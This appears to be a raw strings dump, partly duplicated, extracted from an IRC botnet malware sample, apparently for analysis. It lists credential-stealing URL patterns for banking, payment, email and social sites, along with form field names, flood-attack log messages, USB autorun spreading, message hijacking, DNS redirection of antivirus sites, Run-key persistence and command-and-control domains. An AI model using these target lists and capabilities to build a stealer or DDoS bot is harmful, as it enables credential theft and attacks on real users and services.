%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\services.exe
%System%\services.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\services.exe
\Device\HarddiskVolume1\WINDOWS\system32\services.exe
c:\%original file name%.exe
c:\%original file name%.exe
Explorer.EXE_888_rwx_01E60000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
